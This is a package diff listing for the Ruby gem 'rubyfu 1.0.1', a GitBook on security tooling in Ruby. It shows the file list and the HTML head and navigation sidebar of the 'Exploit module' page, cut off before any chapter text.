rubyfu 1.0.1

Files changed (151)
  1. checksums.yaml +7 -0
  2. data/README.md +96 -0
  3. data/Rakefile +1 -0
  4. data/_book/beginners.html +1299 -0
  5. data/_book/contribution.html +1350 -0
  6. data/_book/contributors/Ruby_Loves_Us.jpg +0 -0
  7. data/_book/contributors/index.html +1294 -0
  8. data/_book/contributors/todo.html +1293 -0
  9. data/_book/cover.jpg +0 -0
  10. data/_book/faqs/index.html +1308 -0
  11. data/_book/files/module03/dns_spoofing_dns-query.pcap +0 -0
  12. data/_book/files/module03/dns_spoofing_dns-req_res.pcap.pcapng +0 -0
  13. data/_book/files/module06/ftp.pcap +0 -0
  14. data/_book/files/module06/packets.pcap +0 -0
  15. data/_book/gitbook/app.js +25001 -0
  16. data/_book/gitbook/fonts/fontawesome/FontAwesome.otf +0 -0
  17. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.eot +0 -0
  18. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.svg +504 -0
  19. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.ttf +0 -0
  20. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.woff +0 -0
  21. data/_book/gitbook/images/apple-touch-icon-precomposed-152.png +0 -0
  22. data/_book/gitbook/images/favicon.ico +0 -0
  23. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/README.md +19 -0
  24. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/index.js +57 -0
  25. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/package.json +47 -0
  26. data/_book/gitbook/plugins/gitbook-plugin-anchors/plugin.css +26 -0
  27. data/_book/gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js +30 -0
  28. data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css +28 -0
  29. data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js +68 -0
  30. data/_book/gitbook/plugins/gitbook-plugin-fontsettings/buttons.js +151 -0
  31. data/_book/gitbook/plugins/gitbook-plugin-fontsettings/website.css +291 -0
  32. data/_book/gitbook/plugins/gitbook-plugin-highlight/ebook.css +131 -0
  33. data/_book/gitbook/plugins/gitbook-plugin-highlight/website.css +426 -0
  34. data/_book/gitbook/plugins/gitbook-plugin-search/lunr.min.js +7 -0
  35. data/_book/gitbook/plugins/gitbook-plugin-search/search.css +27 -0
  36. data/_book/gitbook/plugins/gitbook-plugin-search/search.js +135 -0
  37. data/_book/gitbook/plugins/gitbook-plugin-sharing/buttons.js +93 -0
  38. data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.css +22 -0
  39. data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.js +122 -0
  40. data/_book/gitbook/style.css +9 -0
  41. data/_book/googlec55db2d603c3da8b.html +1 -0
  42. data/_book/images/module02/Cryptography__wiringdiagram.png +0 -0
  43. data/_book/images/module02/packaging__ocra1.png +0 -0
  44. data/_book/images/module03/dns_spoofing_wireshark1.png +0 -0
  45. data/_book/images/module03/dns_spoofing_wireshark2.png +0 -0
  46. data/_book/images/module04/webfu__post_form1.png +0 -0
  47. data/_book/images/module04/webfu__proxy2.png +0 -0
  48. data/_book/images/module04/webfu__twitterAPI1.png +0 -0
  49. data/_book/images/module04/webfu__xmlrpc1.png +0 -0
  50. data/_book/images/module05/msf_template1.png +0 -0
  51. data/_book/images/module06/win-foren__winreg1.png +0 -0
  52. data/_book/images/other/Ruby_Loves_Us.jpg +0 -0
  53. data/_book/images/other/cover.jpg +0 -0
  54. data/_book/images/other/cover_small.jpg +0 -0
  55. data/_book/images/other/logo.png +0 -0
  56. data/_book/images/other/rubyfu.png +0 -0
  57. data/_book/images/other/rubyfu1.png +0 -0
  58. data/_book/images/other/rubyfu3.png +0 -0
  59. data/_book/images/other/rubyfu4.png +0 -0
  60. data/_book/images/other/rubyfu_.png +0 -0
  61. data/_book/index.html +1284 -0
  62. data/_book/module_0x1__basic_ruby_kung_fu/array.html +1297 -0
  63. data/_book/module_0x1__basic_ruby_kung_fu/conversion.html +1386 -0
  64. data/_book/module_0x1__basic_ruby_kung_fu/extraction.html +1346 -0
  65. data/_book/module_0x1__basic_ruby_kung_fu/index.html +1367 -0
  66. data/_book/module_0x1__basic_ruby_kung_fu/string.html +1451 -0
  67. data/_book/module_0x2__system_kung_fu/command_execution.html +1348 -0
  68. data/_book/module_0x2__system_kung_fu/cryptography.html +1396 -0
  69. data/_book/module_0x2__system_kung_fu/email.html +1352 -0
  70. data/_book/module_0x2__system_kung_fu/file_manipulation.html +1371 -0
  71. data/_book/module_0x2__system_kung_fu/index.html +1557 -0
  72. data/_book/module_0x2__system_kung_fu/ncatrb.html +1424 -0
  73. data/_book/module_0x2__system_kung_fu/packaging.md +1 -0
  74. data/_book/module_0x2__system_kung_fu/packaging__ocra1.png +0 -0
  75. data/_book/module_0x2__system_kung_fu/parsing_html,_xml,_json.html +1395 -0
  76. data/_book/module_0x2__system_kung_fu/rce_as_a_service.html +1336 -0
  77. data/_book/module_0x2__system_kung_fu/smtp_enumeration.html +1308 -0
  78. data/_book/module_0x2__system_kung_fu/system_shell.html +1299 -0
  79. data/_book/module_0x2__system_kung_fu/virustotal.html +1318 -0
  80. data/_book/module_0x3__network_kung_fu/Remote_shell.md +19 -0
  81. data/_book/module_0x3__network_kung_fu/arp_spoofing.html +1420 -0
  82. data/_book/module_0x3__network_kung_fu/dns.html +1315 -0
  83. data/_book/module_0x3__network_kung_fu/dns_bruteforce.md +49 -0
  84. data/_book/module_0x3__network_kung_fu/dns_enumeration.html +1371 -0
  85. data/_book/module_0x3__network_kung_fu/dns_spoofing.html +1694 -0
  86. data/_book/module_0x3__network_kung_fu/dns_spoofing_wireshark2.png +0 -0
  87. data/_book/module_0x3__network_kung_fu/ftp.html +1287 -0
  88. data/_book/module_0x3__network_kung_fu/index.html +1392 -0
  89. data/_book/module_0x3__network_kung_fu/network_scanning.html +1339 -0
  90. data/_book/module_0x3__network_kung_fu/network_traffic_analysis.html +1356 -0
  91. data/_book/module_0x3__network_kung_fu/nmap.html +1355 -0
  92. data/_book/module_0x3__network_kung_fu/oracle_tns_enum1.png +0 -0
  93. data/_book/module_0x3__network_kung_fu/packet_manipulation.html +1386 -0
  94. data/_book/module_0x3__network_kung_fu/ruby_socket.html +1553 -0
  95. data/_book/module_0x3__network_kung_fu/snmp_enumeration.html +1314 -0
  96. data/_book/module_0x3__network_kung_fu/ssh.html +1461 -0
  97. data/_book/module_0x3__network_kung_fu/ssid_finder.html +1324 -0
  98. data/_book/module_0x3__network_kung_fu/tns_enumeration.html +1505 -0
  99. data/_book/module_0x4__web_kung_fu/browser_manipulation.html +1630 -0
  100. data/_book/module_0x4__web_kung_fu/databases.html +1531 -0
  101. data/_book/module_0x4__web_kung_fu/extending_burpsuite.html +1303 -0
  102. data/_book/module_0x4__web_kung_fu/index.html +1536 -0
  103. data/_book/module_0x4__web_kung_fu/interacting_with_apis.html +1271 -0
  104. data/_book/module_0x4__web_kung_fu/ruby2javascript.html +1303 -0
  105. data/_book/module_0x4__web_kung_fu/sql_injection_scanner.html +1489 -0
  106. data/_book/module_0x4__web_kung_fu/twitter_api.html +1328 -0
  107. data/_book/module_0x4__web_kung_fu/web_servcies_and_apis.html +1291 -0
  108. data/_book/module_0x4__web_kung_fu/web_server_and_proxy.html +1370 -0
  109. data/_book/module_0x4__web_kung_fu/web_services.html +1394 -0
  110. data/_book/module_0x4__web_kung_fu/webfu__burp-ext1.png +0 -0
  111. data/_book/module_0x4__web_kung_fu/webfu__burp-ext2.png +0 -0
  112. data/_book/module_0x4__web_kung_fu/webfu__burp_setenv1.png +0 -0
  113. data/_book/module_0x4__web_kung_fu/webfu__proxy2.png +0 -0
  114. data/_book/module_0x4__web_kung_fu/webfu__twitterAPI1.png +0 -0
  115. data/_book/module_0x4__web_kung_fu/webfu__xmlrpc1.png +0 -0
  116. data/_book/module_0x4__web_kung_fu/wordpress_api.html +1543 -0
  117. data/_book/module_0x5__exploitation_kung_fu/MSF-struct.png +0 -0
  118. data/_book/module_0x5__exploitation_kung_fu/auxiliary_module.html +1870 -0
  119. data/_book/module_0x5__exploitation_kung_fu/exploit_module.html +1523 -0
  120. data/_book/module_0x5__exploitation_kung_fu/extensions.html +1466 -0
  121. data/_book/module_0x5__exploitation_kung_fu/fuzzer.html +1325 -0
  122. data/_book/module_0x5__exploitation_kung_fu/index.html +1319 -0
  123. data/_book/module_0x5__exploitation_kung_fu/metasm.html +1322 -0
  124. data/_book/module_0x5__exploitation_kung_fu/metasploit.html +1441 -0
  125. data/_book/module_0x5__exploitation_kung_fu/meterpreter.html +1327 -0
  126. data/_book/module_0x5__exploitation_kung_fu/meterpreter_scripting.html +1318 -0
  127. data/_book/module_0x5__exploitation_kung_fu/msf_meter_railgun1.png +0 -0
  128. data/_book/module_0x5__exploitation_kung_fu/msf_template1.png +0 -0
  129. data/_book/module_0x5__exploitation_kung_fu/railgun_api_extension.html +1300 -0
  130. data/_book/module_0x6__forensic/android_forensic.html +1356 -0
  131. data/_book/module_0x6__forensic/index.html +1332 -0
  132. data/_book/module_0x6__forensic/parsing_log_files.html +1375 -0
  133. data/_book/module_0x6__forensic/win-foren__winreg1.png +0 -0
  134. data/_book/module_0x6__forensic/windows_forensic.html +1289 -0
  135. data/_book/package.json +5 -0
  136. data/_book/references/index.html +1338 -0
  137. data/_book/required_gems.html +1342 -0
  138. data/_book/rubyfu_.png +0 -0
  139. data/_book/search_index.json +1 -0
  140. data/_book/styles/ebook.css +1 -0
  141. data/_book/styles/epub.css +1 -0
  142. data/_book/styles/header.js +5 -0
  143. data/_book/styles/mobi.css +1 -0
  144. data/_book/styles/pdf.css +1 -0
  145. data/_book/styles/website.css +41 -0
  146. data/bin/rubyfu +48 -0
  147. data/lib/rubyfu.rb +36 -0
  148. data/lib/rubyfu/browse.rb +35 -0
  149. data/lib/rubyfu/version.rb +3 -0
  150. data/lib/rubyfu/webserver.rb +30 -0
  151. metadata +210 -0
@@ -0,0 +1,1523 @@
1
+ <!DOCTYPE HTML>
2
+ <html lang="en" >
3
+
4
+ <head>
5
+
6
+ <meta charset="UTF-8">
7
+ <meta http-equiv="X-UA-Compatible" content="IE=edge" />
8
+ <title>Exploit module | RubyFu</title>
9
+ <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
10
+ <meta name="description" content="">
11
+ <meta name="generator" content="GitBook 2.6.2">
12
+
13
+
14
+ <meta name="HandheldFriendly" content="true"/>
15
+ <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
16
+ <meta name="apple-mobile-web-app-capable" content="yes">
17
+ <meta name="apple-mobile-web-app-status-bar-style" content="black">
18
+ <link rel="apple-touch-icon-precomposed" sizes="152x152" href="../gitbook/images/apple-touch-icon-precomposed-152.png">
19
+ <link rel="shortcut icon" href="../gitbook/images/favicon.ico" type="image/x-icon">
20
+
21
+ <link rel="stylesheet" href="../gitbook/style.css">
22
+
23
+
24
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-anchors/plugin.css">
25
+
26
+
27
+
28
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-splitter/splitter.css">
29
+
30
+
31
+
32
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css">
33
+
34
+
35
+
36
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-highlight/website.css">
37
+
38
+
39
+
40
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-search/search.css">
41
+
42
+
43
+
44
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-fontsettings/website.css">
45
+
46
+
47
+
48
+ <link rel="stylesheet" href="../styles/website.css">
49
+
50
+
51
+
52
+
53
+
54
+ <link rel="next" href="../module_0x5__exploitation_kung_fu/meterpreter.html" />
55
+
56
+
57
+ <link rel="prev" href="../module_0x5__exploitation_kung_fu/auxiliary_module.html" />
58
+
59
+
60
+ <script type="text/javascript" src="../styles/header.js"></script>
61
+ </head>
62
+ <body>
63
+
64
+
65
+ <div class="book"
66
+ data-level="5.2.2"
67
+ data-chapter-title="Exploit module"
68
+ data-filepath="module_0x5__exploitation_kung_fu/exploit_module.md"
69
+ data-basepath=".."
70
+ data-revision="Wed Jan 27 2016 09:00:51 GMT+0300 (AST)"
71
+ data-innerlanguage="">
72
+
73
+
74
+ <div class="book-summary">
75
+ <nav role="navigation">
76
+ <ul class="summary">
77
+
78
+
79
+
80
+
81
+
82
+
83
+
84
+
85
+
86
+ <li class="chapter " data-level="0" data-path="index.html">
87
+
88
+
89
+ <a href="../index.html">
90
+
91
+ <i class="fa fa-check"></i>
92
+
93
+ Module 0x0 | Introduction
94
+ </a>
95
+
96
+
97
+ <ul class="articles">
98
+
99
+
100
+ <li class="chapter " data-level="0.1" data-path="contribution.html">
101
+
102
+
103
+ <a href="../contribution.html">
104
+
105
+ <i class="fa fa-check"></i>
106
+
107
+ <b>0.1.</b>
108
+
109
+ Contribution
110
+ </a>
111
+
112
+
113
+ </li>
114
+
115
+ <li class="chapter " data-level="0.2" data-path="beginners.html">
116
+
117
+
118
+ <a href="../beginners.html">
119
+
120
+ <i class="fa fa-check"></i>
121
+
122
+ <b>0.2.</b>
123
+
124
+ Beginners
125
+ </a>
126
+
127
+
128
+ </li>
129
+
130
+ <li class="chapter " data-level="0.3" data-path="required_gems.html">
131
+
132
+
133
+ <a href="../required_gems.html">
134
+
135
+ <i class="fa fa-check"></i>
136
+
137
+ <b>0.3.</b>
138
+
139
+ Required Gems
140
+ </a>
141
+
142
+
143
+ </li>
144
+
145
+
146
+ </ul>
147
+
148
+ </li>
149
+
150
+ <li class="chapter " data-level="1" data-path="module_0x1__basic_ruby_kung_fu/index.html">
151
+
152
+
153
+ <a href="../module_0x1__basic_ruby_kung_fu/index.html">
154
+
155
+ <i class="fa fa-check"></i>
156
+
157
+ <b>1.</b>
158
+
159
+ Module 0x1 | Basic Ruby Kung Fu
160
+ </a>
161
+
162
+
163
+ <ul class="articles">
164
+
165
+
166
+ <li class="chapter " data-level="1.1" data-path="module_0x1__basic_ruby_kung_fu/string.html">
167
+
168
+
169
+ <a href="../module_0x1__basic_ruby_kung_fu/string.html">
170
+
171
+ <i class="fa fa-check"></i>
172
+
173
+ <b>1.1.</b>
174
+
175
+ String
176
+ </a>
177
+
178
+
179
+ <ul class="articles">
180
+
181
+
182
+ <li class="chapter " data-level="1.1.1" data-path="module_0x1__basic_ruby_kung_fu/conversion.html">
183
+
184
+
185
+ <a href="../module_0x1__basic_ruby_kung_fu/conversion.html">
186
+
187
+ <i class="fa fa-check"></i>
188
+
189
+ <b>1.1.1.</b>
190
+
191
+ Conversion
192
+ </a>
193
+
194
+
195
+ </li>
196
+
197
+ <li class="chapter " data-level="1.1.2" data-path="module_0x1__basic_ruby_kung_fu/extraction.html">
198
+
199
+
200
+ <a href="../module_0x1__basic_ruby_kung_fu/extraction.html">
201
+
202
+ <i class="fa fa-check"></i>
203
+
204
+ <b>1.1.2.</b>
205
+
206
+ Extraction
207
+ </a>
208
+
209
+
210
+ </li>
211
+
212
+
213
+ </ul>
214
+
215
+ </li>
216
+
217
+ <li class="chapter " data-level="1.2" data-path="module_0x1__basic_ruby_kung_fu/array.html">
218
+
219
+
220
+ <a href="../module_0x1__basic_ruby_kung_fu/array.html">
221
+
222
+ <i class="fa fa-check"></i>
223
+
224
+ <b>1.2.</b>
225
+
226
+ Array
227
+ </a>
228
+
229
+
230
+ </li>
231
+
232
+
233
+ </ul>
234
+
235
+ </li>
236
+
237
+ <li class="chapter " data-level="2" data-path="module_0x2__system_kung_fu/index.html">
238
+
239
+
240
+ <a href="../module_0x2__system_kung_fu/index.html">
241
+
242
+ <i class="fa fa-check"></i>
243
+
244
+ <b>2.</b>
245
+
246
+ Module 0x2 | System Kung Fu
247
+ </a>
248
+
249
+
250
+ <ul class="articles">
251
+
252
+
253
+ <li class="chapter " data-level="2.1" data-path="module_0x2__system_kung_fu/command_execution.html">
254
+
255
+
256
+ <a href="../module_0x2__system_kung_fu/command_execution.html">
257
+
258
+ <i class="fa fa-check"></i>
259
+
260
+ <b>2.1.</b>
261
+
262
+ Command Execution
263
+ </a>
264
+
265
+
266
+ </li>
267
+
268
+ <li class="chapter " data-level="2.2" data-path="module_0x2__system_kung_fu/file_manipulation.html">
269
+
270
+
271
+ <a href="../module_0x2__system_kung_fu/file_manipulation.html">
272
+
273
+ <i class="fa fa-check"></i>
274
+
275
+ <b>2.2.</b>
276
+
277
+ File manipulation
278
+ </a>
279
+
280
+
281
+ <ul class="articles">
282
+
283
+
284
+ <li class="chapter " data-level="2.2.1" data-path="module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
285
+
286
+
287
+ <a href="../module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
288
+
289
+ <i class="fa fa-check"></i>
290
+
291
+ <b>2.2.1.</b>
292
+
293
+ Parsing HTML, XML, JSON
294
+ </a>
295
+
296
+
297
+ </li>
298
+
299
+
300
+ </ul>
301
+
302
+ </li>
303
+
304
+ <li class="chapter " data-level="2.3" data-path="module_0x2__system_kung_fu/cryptography.html">
305
+
306
+
307
+ <a href="../module_0x2__system_kung_fu/cryptography.html">
308
+
309
+ <i class="fa fa-check"></i>
310
+
311
+ <b>2.3.</b>
312
+
313
+ Cryptography
314
+ </a>
315
+
316
+
317
+ </li>
318
+
319
+ <li class="chapter " data-level="2.4" data-path="module_0x2__system_kung_fu/system_shell.html">
320
+
321
+
322
+ <a href="../module_0x2__system_kung_fu/system_shell.html">
323
+
324
+ <i class="fa fa-check"></i>
325
+
326
+ <b>2.4.</b>
327
+
328
+ Remote Shell
329
+ </a>
330
+
331
+
332
+ <ul class="articles">
333
+
334
+
335
+ <li class="chapter " data-level="2.4.1" data-path="module_0x2__system_kung_fu/ncatrb.html">
336
+
337
+
338
+ <a href="../module_0x2__system_kung_fu/ncatrb.html">
339
+
340
+ <i class="fa fa-check"></i>
341
+
342
+ <b>2.4.1.</b>
343
+
344
+ Ncat.rb
345
+ </a>
346
+
347
+
348
+ </li>
349
+
350
+ <li class="chapter " data-level="2.4.2" data-path="module_0x2__system_kung_fu/rce_as_a_service.html">
351
+
352
+
353
+ <a href="../module_0x2__system_kung_fu/rce_as_a_service.html">
354
+
355
+ <i class="fa fa-check"></i>
356
+
357
+ <b>2.4.2.</b>
358
+
359
+ RCE as a Service
360
+ </a>
361
+
362
+
363
+ </li>
364
+
365
+
366
+ </ul>
367
+
368
+ </li>
369
+
370
+ <li class="chapter " data-level="2.5" data-path="module_0x2__system_kung_fu/virustotal.html">
371
+
372
+
373
+ <a href="../module_0x2__system_kung_fu/virustotal.html">
374
+
375
+ <i class="fa fa-check"></i>
376
+
377
+ <b>2.5.</b>
378
+
379
+ VirusTotal
380
+ </a>
381
+
382
+
383
+ </li>
384
+
385
+
386
+ </ul>
387
+
388
+ </li>
389
+
390
+ <li class="chapter " data-level="3" data-path="module_0x3__network_kung_fu/index.html">
391
+
392
+
393
+ <a href="../module_0x3__network_kung_fu/index.html">
394
+
395
+ <i class="fa fa-check"></i>
396
+
397
+ <b>3.</b>
398
+
399
+ Module 0x3 | Network Kung Fu
400
+ </a>
401
+
402
+
403
+ <ul class="articles">
404
+
405
+
406
+ <li class="chapter " data-level="3.1" data-path="module_0x3__network_kung_fu/ruby_socket.html">
407
+
408
+
409
+ <a href="../module_0x3__network_kung_fu/ruby_socket.html">
410
+
411
+ <i class="fa fa-check"></i>
412
+
413
+ <b>3.1.</b>
414
+
415
+ Ruby Socket
416
+ </a>
417
+
418
+
419
+ </li>
420
+
421
+ <li class="chapter " data-level="3.2" data-path="module_0x3__network_kung_fu/ssid_finder.html">
422
+
423
+
424
+ <a href="../module_0x3__network_kung_fu/ssid_finder.html">
425
+
426
+ <i class="fa fa-check"></i>
427
+
428
+ <b>3.2.</b>
429
+
430
+ SSID Finder
431
+ </a>
432
+
433
+
434
+ </li>
435
+
436
+ <li class="chapter " data-level="3.3" data-path="module_0x3__network_kung_fu/ftp.html">
437
+
438
+
439
+ <a href="../module_0x3__network_kung_fu/ftp.html">
440
+
441
+ <i class="fa fa-check"></i>
442
+
443
+ <b>3.3.</b>
444
+
445
+ FTP
446
+ </a>
447
+
448
+
449
+ </li>
450
+
451
+ <li class="chapter " data-level="3.4" data-path="module_0x3__network_kung_fu/ssh.html">
452
+
453
+
454
+ <a href="../module_0x3__network_kung_fu/ssh.html">
455
+
456
+ <i class="fa fa-check"></i>
457
+
458
+ <b>3.4.</b>
459
+
460
+ SSH
461
+ </a>
462
+
463
+
464
+ </li>
465
+
466
+ <li class="chapter " data-level="3.5" data-path="module_0x2__system_kung_fu/email.html">
467
+
468
+
469
+ <a href="../module_0x2__system_kung_fu/email.html">
470
+
471
+ <i class="fa fa-check"></i>
472
+
473
+ <b>3.5.</b>
474
+
475
+ Email
476
+ </a>
477
+
478
+
479
+ <ul class="articles">
480
+
481
+
482
+ <li class="chapter " data-level="3.5.1" data-path="module_0x2__system_kung_fu/smtp_enumeration.html">
483
+
484
+
485
+ <a href="../module_0x2__system_kung_fu/smtp_enumeration.html">
486
+
487
+ <i class="fa fa-check"></i>
488
+
489
+ <b>3.5.1.</b>
490
+
491
+ SMTP Enumeration
492
+ </a>
493
+
494
+
495
+ </li>
496
+
497
+
498
+ </ul>
499
+
500
+ </li>
501
+
502
+ <li class="chapter " data-level="3.6" data-path="module_0x3__network_kung_fu/network_scanning.html">
503
+
504
+
505
+ <a href="../module_0x3__network_kung_fu/network_scanning.html">
506
+
507
+ <i class="fa fa-check"></i>
508
+
509
+ <b>3.6.</b>
510
+
511
+ Network Scanning
512
+ </a>
513
+
514
+
515
+ <ul class="articles">
516
+
517
+
518
+ <li class="chapter " data-level="3.6.1" data-path="module_0x3__network_kung_fu/nmap.html">
519
+
520
+
521
+ <a href="../module_0x3__network_kung_fu/nmap.html">
522
+
523
+ <i class="fa fa-check"></i>
524
+
525
+ <b>3.6.1.</b>
526
+
527
+ Nmap
528
+ </a>
529
+
530
+
531
+ </li>
532
+
533
+
534
+ </ul>
535
+
536
+ </li>
537
+
538
+ <li class="chapter " data-level="3.7" data-path="module_0x3__network_kung_fu/dns.html">
539
+
540
+
541
+ <a href="../module_0x3__network_kung_fu/dns.html">
542
+
543
+ <i class="fa fa-check"></i>
544
+
545
+ <b>3.7.</b>
546
+
547
+ DNS
548
+ </a>
549
+
550
+
551
+ <ul class="articles">
552
+
553
+
554
+ <li class="chapter " data-level="3.7.1" data-path="module_0x3__network_kung_fu/dns_enumeration.html">
555
+
556
+
557
+ <a href="../module_0x3__network_kung_fu/dns_enumeration.html">
558
+
559
+ <i class="fa fa-check"></i>
560
+
561
+ <b>3.7.1.</b>
562
+
563
+ DNS Enumeration
564
+ </a>
565
+
566
+
567
+ </li>
568
+
569
+
570
+ </ul>
571
+
572
+ </li>
573
+
574
+ <li class="chapter " data-level="3.8" data-path="module_0x3__network_kung_fu/snmp_enumeration.html">
575
+
576
+
577
+ <a href="../module_0x3__network_kung_fu/snmp_enumeration.html">
578
+
579
+ <i class="fa fa-check"></i>
580
+
581
+ <b>3.8.</b>
582
+
583
+ SNMP Enumeration
584
+ </a>
585
+
586
+
587
+ </li>
588
+
589
+ <li class="chapter " data-level="3.9" data-path="module_0x3__network_kung_fu/tns_enumeration.html">
590
+
591
+
592
+ <a href="../module_0x3__network_kung_fu/tns_enumeration.html">
593
+
594
+ <i class="fa fa-check"></i>
595
+
596
+ <b>3.9.</b>
597
+
598
+ Oracle TNS Enumeration
599
+ </a>
600
+
601
+
602
+ </li>
603
+
604
+ <li class="chapter " data-level="3.10" data-path="module_0x3__network_kung_fu/packet_manipulation.html">
605
+
606
+
607
+ <a href="../module_0x3__network_kung_fu/packet_manipulation.html">
608
+
609
+ <i class="fa fa-check"></i>
610
+
611
+ <b>3.10.</b>
612
+
613
+ Packet manipulation
614
+ </a>
615
+
616
+
617
+ <ul class="articles">
618
+
619
+
620
+ <li class="chapter " data-level="3.10.1" data-path="module_0x3__network_kung_fu/arp_spoofing.html">
621
+
622
+
623
+ <a href="../module_0x3__network_kung_fu/arp_spoofing.html">
624
+
625
+ <i class="fa fa-check"></i>
626
+
627
+ <b>3.10.1.</b>
628
+
629
+ ARP Spoofing
630
+ </a>
631
+
632
+
633
+ </li>
634
+
635
+ <li class="chapter " data-level="3.10.2" data-path="module_0x3__network_kung_fu/dns_spoofing.html">
636
+
637
+
638
+ <a href="../module_0x3__network_kung_fu/dns_spoofing.html">
639
+
640
+ <i class="fa fa-check"></i>
641
+
642
+ <b>3.10.2.</b>
643
+
644
+ DNS Spoofing
645
+ </a>
646
+
647
+
648
+ </li>
649
+
650
+
651
+ </ul>
652
+
653
+ </li>
654
+
655
+
656
+ </ul>
657
+
658
+ </li>
659
+
660
+ <li class="chapter " data-level="4" data-path="module_0x4__web_kung_fu/index.html">
661
+
662
+
663
+ <a href="../module_0x4__web_kung_fu/index.html">
664
+
665
+ <i class="fa fa-check"></i>
666
+
667
+ <b>4.</b>
668
+
669
+ Module 0x4 | Web Kung Fu
670
+ </a>
671
+
672
+
673
+ <ul class="articles">
674
+
675
+
676
+ <li class="chapter " data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
677
+
678
+
679
+ <a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
680
+
681
+ <i class="fa fa-check"></i>
682
+
683
+ <b>4.1.</b>
684
+
685
+ SQL Injection Scanner
686
+ </a>
687
+
688
+
689
+ </li>
690
+
691
+ <li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
692
+
693
+
694
+ <a href="../module_0x4__web_kung_fu/databases.html">
695
+
696
+ <i class="fa fa-check"></i>
697
+
698
+ <b>4.2.</b>
699
+
700
+ Databases
701
+ </a>
702
+
703
+
704
+ </li>
705
+
706
+ <li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
707
+
708
+
709
+ <a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
710
+
711
+ <i class="fa fa-check"></i>
712
+
713
+ <b>4.3.</b>
714
+
715
+ Extending Burp Suite
716
+ </a>
717
+
718
+
719
+ </li>
720
+
721
+ <li class="chapter " data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
722
+
723
+
724
+ <a href="../module_0x4__web_kung_fu/browser_manipulation.html">
725
+
726
+ <i class="fa fa-check"></i>
727
+
728
+ <b>4.4.</b>
729
+
730
+ Browser Manipulation
731
+ </a>
732
+
733
+
734
+ </li>
735
+
736
+ <li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
737
+
738
+
739
+ <a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
740
+
741
+ <i class="fa fa-check"></i>
742
+
743
+ <b>4.5.</b>
744
+
745
+ Web Services and APIs
746
+ </a>
747
+
748
+
749
+ <ul class="articles">
750
+
751
+
752
+ <li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
753
+
754
+
755
+ <a href="../module_0x4__web_kung_fu/web_services.html">
756
+
757
+ <i class="fa fa-check"></i>
758
+
759
+ <b>4.5.1.</b>
760
+
761
+ Interacting with Web Services
762
+ </a>
763
+
764
+
765
+ </li>
766
+
767
+ <li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
768
+
769
+
770
+ <a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
771
+
772
+ <i class="fa fa-check"></i>
773
+
774
+ <b>4.5.2.</b>
775
+
776
+ Interacting with APIs
777
+ </a>
778
+
779
+
780
+ <ul class="articles">
781
+
782
+
783
+ <li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
784
+
785
+
786
+ <a href="../module_0x4__web_kung_fu/wordpress_api.html">
787
+
788
+ <i class="fa fa-check"></i>
789
+
790
+ <b>4.5.2.1.</b>
791
+
792
+ WordPress API
793
+ </a>
794
+
795
+
796
+ </li>
797
+
798
+ <li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
799
+
800
+
801
+ <a href="../module_0x4__web_kung_fu/twitter_api.html">
802
+
803
+ <i class="fa fa-check"></i>
804
+
805
+ <b>4.5.2.2.</b>
806
+
807
+ Twitter API
808
+ </a>
809
+
810
+
811
+ </li>
812
+
813
+
814
+ </ul>
815
+
816
+ </li>
817
+
818
+
819
+ </ul>
820
+
821
+ </li>
822
+
823
+ <li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
824
+
825
+
826
+ <a href="../module_0x4__web_kung_fu/ruby2javascript.html">
827
+
828
+ <i class="fa fa-check"></i>
829
+
830
+ <b>4.6.</b>
831
+
832
+ Ruby 2 JavaScript
833
+ </a>
834
+
835
+
836
+ </li>
837
+
838
+ <li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
839
+
840
+
841
+ <a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
842
+
843
+ <i class="fa fa-check"></i>
844
+
845
+ <b>4.7.</b>
846
+
847
+ Web Server and Proxy
848
+ </a>
849
+
850
+
851
+ </li>
852
+
853
+
854
+ </ul>
855
+
856
+ </li>
857
+
858
+ <li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
859
+
860
+
861
+ <a href="../module_0x5__exploitation_kung_fu/index.html">
862
+
863
+ <i class="fa fa-check"></i>
864
+
865
+ <b>5.</b>
866
+
867
+ Module 0x5 | Exploitation Kung Fu
868
+ </a>
869
+
870
+
871
+ <ul class="articles">
872
+
873
+
874
